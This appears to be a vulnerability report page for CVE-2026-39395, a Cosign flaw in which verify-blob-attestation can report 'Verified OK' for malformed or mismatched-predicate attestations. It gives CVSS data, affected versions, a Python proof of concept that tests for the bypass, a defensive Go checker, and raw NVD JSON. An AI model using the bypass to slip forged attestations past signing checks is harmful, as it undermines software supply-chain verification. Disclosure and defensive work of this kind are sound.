Security Vulnerability Report
CVE-2026-39395 CVSS 4.3 MEDIUM


Published: 2026-04-07 20:16:33
Last Modified: 2026-04-15 15:57:49

Description

Cosign provides code signing and transparency for containers and binaries. Prior to 3.0.6 and 2.6.3, cosign verify-blob-attestation may erroneously report a "Verified OK" result for attestations with malformed payloads or mismatched predicate types. For old-format bundles and detached signatures, this was due to a logic flaw in the error handling of the predicate type validation. For new-format bundles, the predicate type validation was bypassed completely. This vulnerability is fixed in 3.0.6 and 2.6.3.

CVSS Details

CVSS Score (CNA, secondary)
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

CVSS Score (NVD, primary)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Weakness
CWE-754 (Improper Check for Unusual or Exceptional Conditions)

Configurations (Affected Products)

cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:* (Cosign < 2.6.3) - VULNERABLE
cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:* (Cosign >= 3.0.0, < 3.0.6) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2026-39395 (Cosign Verification Bypass)

This script demonstrates the conceptual verification bypass. In a vulnerable
environment (cosign < 2.6.3, or 3.0.0 <= cosign < 3.0.6), cosign
verify-blob-attestation might report 'Verified OK' even if the predicate type
does not match the expected policy.
"""
import os
import subprocess

# Configuration
BLOB_PATH = "artifact.bin"
SIGNATURE_PATH = "artifact.sig"   # DSSE envelope written by `cosign attest-blob`
PUBLIC_KEY_PATH = "cosign.pub"    # signer's public key (assumed path; verification needs a key or identity flags)
PREDICATE_TYPE = "https://slsa.dev/provenance/v0.2"    # Expected valid type
MALICIOUS_TYPE = "https://attacker.example/fake-type"  # Mismatched type


def simulate_vulnerable_verification():
    print(f"[*] Simulating verification for blob: {BLOB_PATH}")
    print(f"[*] Expected Predicate Type: {PREDICATE_TYPE}")
    print(f"[*] Actual Predicate Type in Attestation: {MALICIOUS_TYPE}")

    # Note: In a real scenario, the attacker would have signed the blob
    # with a payload containing the MALICIOUS_TYPE.
    # Here we invoke cosign to verify the attestation. The expected predicate
    # type is selected with --type (an alias such as slsaprovenance02 or a full
    # URI); cosign has no --predicate-type flag.
    cmd = [
        "cosign", "verify-blob-attestation",
        "--key", PUBLIC_KEY_PATH,
        "--type", PREDICATE_TYPE,
        "--signature", SIGNATURE_PATH,
        BLOB_PATH,
    ]
    try:
        # Run the verification command
        result = subprocess.run(cmd, capture_output=True, text=True, check=False)
    except FileNotFoundError:
        print("[-] 'cosign' binary not found. This PoC requires cosign to be installed.")
        return

    # cosign writes "Verified OK" to stderr, not stdout, so inspect both streams
    # together with the exit status.
    output = result.stdout + result.stderr
    if result.returncode == 0 and "Verified OK" in output:
        print("[+] Vulnerability Exploited: cosign returned 'Verified OK' despite mismatched predicate type!")
        print(f"[+] Output: {output}")
    else:
        print("[-] Verification failed or output unexpected (fixed version, or setup problem).")
        print(f"[-] Exit code: {result.returncode}")
        print(f"[-] Stderr: {result.stderr}")


if __name__ == "__main__":
    # Prerequisite: artifact.bin, artifact.sig and cosign.pub must exist for the command to run
    if os.path.exists(BLOB_PATH) and os.path.exists(SIGNATURE_PATH):
        simulate_vulnerable_verification()
    else:
        print("[-] Setup required: Please create 'artifact.bin' and sign it with a mismatched predicate type to demonstrate.")
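The description above says an affected cosign can print "Verified OK" for a malformed payload or for a predicate type other than the one requested. The practical consequence is that a pipeline which gates only on cosign's exit status has, on those versions, no predicate-type check at all. The Go program below is an added example and is not cosign's code or anything from the sigstore project: it performs the check a consumer should run itself after cosign has verified the signature, directly on the DSSE envelope cosign writes (the file passed as --signature). The envelope fields (payloadType, base64 payload), the in-toto Statement fields (_type, predicateType, subject digests) and the sha256 subject digest are the standard formats; the artifact bytes, the attacker.example predicate type and the MakeEnvelope helper are constructed for the demo, and the envelope it builds is unsigned.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// dsseEnvelope is the DSSE wrapper cosign emits for attestations; only the
// fields needed for this check are modelled (signature bytes are ignored here,
// because cosign has already verified them).
type dsseEnvelope struct {
	PayloadType string `json:"payloadType"`
	Payload     string `json:"payload"` // base64-encoded in-toto Statement
}

// statement models the in-toto Statement fields that policy must pin down.
type statement struct {
	Type          string `json:"_type"`
	PredicateType string `json:"predicateType"`
	Subject       []struct {
		Name   string            `json:"name"`
		Digest map[string]string `json:"digest"`
	} `json:"subject"`
}

var (
	ErrMalformed         = errors.New("malformed attestation payload")
	ErrPredicateMismatch = errors.New("predicate type mismatch")
	ErrSubjectMismatch   = errors.New("subject digest mismatch")
)

// CheckAttestation re-validates an attestation independently of what cosign
// printed: the payload must decode to an in-toto Statement, predicateType must
// equal the policy's expected URI exactly, and one subject must carry the
// sha256 of the blob being checked. nil is the only "OK"; every other path
// returns a wrapped sentinel error so callers can distinguish the failure.
func CheckAttestation(envelopeJSON, blob []byte, wantPredicateType string) error {
	var env dsseEnvelope
	if err := json.Unmarshal(envelopeJSON, &env); err != nil {
		return fmt.Errorf("%w: envelope is not JSON: %v", ErrMalformed, err)
	}
	if env.PayloadType != "application/vnd.in-toto+json" {
		return fmt.Errorf("%w: unexpected payloadType %q", ErrMalformed, env.PayloadType)
	}
	raw, err := base64.StdEncoding.DecodeString(env.Payload)
	if err != nil {
		return fmt.Errorf("%w: payload is not base64: %v", ErrMalformed, err)
	}
	var st statement
	if err := json.Unmarshal(raw, &st); err != nil {
		return fmt.Errorf("%w: payload is not an in-toto Statement: %v", ErrMalformed, err)
	}
	if st.Type != "https://in-toto.io/Statement/v0.1" && st.Type != "https://in-toto.io/Statement/v1" {
		return fmt.Errorf("%w: unexpected _type %q", ErrMalformed, st.Type)
	}
	// Exact match only: no prefix matching and no pass-through for an empty type.
	if st.PredicateType == "" || st.PredicateType != wantPredicateType {
		return fmt.Errorf("%w: got %q, want %q", ErrPredicateMismatch, st.PredicateType, wantPredicateType)
	}
	sum := sha256.Sum256(blob)
	want := hex.EncodeToString(sum[:])
	for _, s := range st.Subject {
		if s.Digest["sha256"] == want {
			return nil
		}
	}
	return fmt.Errorf("%w: no subject with sha256 %s", ErrSubjectMismatch, want)
}

// MakeEnvelope builds a constructed, unsigned envelope for the demo; a real
// one comes from `cosign attest-blob` and also carries a signatures array.
func MakeEnvelope(blob []byte, predicateType string) []byte {
	sum := sha256.Sum256(blob)
	st := map[string]any{
		"_type":         "https://in-toto.io/Statement/v0.1",
		"predicateType": predicateType,
		"subject": []map[string]any{{
			"name":   "artifact.bin",
			"digest": map[string]string{"sha256": hex.EncodeToString(sum[:])},
		}},
		"predicate": map[string]any{},
	}
	raw, _ := json.Marshal(st)
	env, _ := json.Marshal(dsseEnvelope{
		PayloadType: "application/vnd.in-toto+json",
		Payload:     base64.StdEncoding.EncodeToString(raw),
	})
	return env
}

func main() {
	blob := []byte("constructed artifact contents\n") // constructed sample artifact
	const policyType = "https://slsa.dev/provenance/v0.2"
	for name, env := range map[string][]byte{
		"matching predicate type":   MakeEnvelope(blob, policyType),
		"mismatched predicate type": MakeEnvelope(blob, "https://attacker.example/fake-type"),
		"malformed payload":         []byte(`{"payloadType":"application/vnd.in-toto+json","payload":"not*base64"}`),
	} {
		fmt.Printf("%-26s -> %v\n", name, CheckAttestation(env, blob, policyType))
	}
}
```

Only the "matching predicate type" case returns nil; the mismatched and malformed envelopes return errors that wrap ErrPredicateMismatch and ErrMalformed respectively. The check is worth keeping after upgrading to 3.0.6 or 2.6.3 as well: the fix changes what cosign reports, but an independent comparison of predicateType and subject digest against policy costs little and does not depend on any one tool's error handling.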

References

https://github.com/sigstore/cosign/security/advisories/GHSA-w6c6-c85g-mmv6 (Vendor Advisory, Mitigation)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39395", "sourceIdentifier": "[email protected]", "published": "2026-04-07T20:16:33.140", "lastModified": "2026-04-15T15:57:49.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cosign provides code signing and transparency for containers and binaries. Prior to 3.0.6 and 2.6.3, cosign verify-blob-attestation may erroneously report a \"Verified OK\" result for attestations with malformed payloads or mismatched predicate types. For old-format bundles and detached signatures, this was due to a logic flaw in the error handling of the predicate type validation. For new-format bundles, the predicate type validation was bypassed completely. This vulnerability is fixed in 3.0.6 and 2.6.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", 
"versionEndExcluding": "2.6.3", "matchCriteriaId": "E1C20B41-D20F-4FC4-AFD6-00C45B60CC58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sigstore:cosign:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.0.6", "matchCriteriaId": "8DD2B507-E86E-4276-86EC-0FDE82CB0BB1"}]}]}], "references": [{"url": "https://github.com/sigstore/cosign/security/advisories/GHSA-w6c6-c85g-mmv6", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}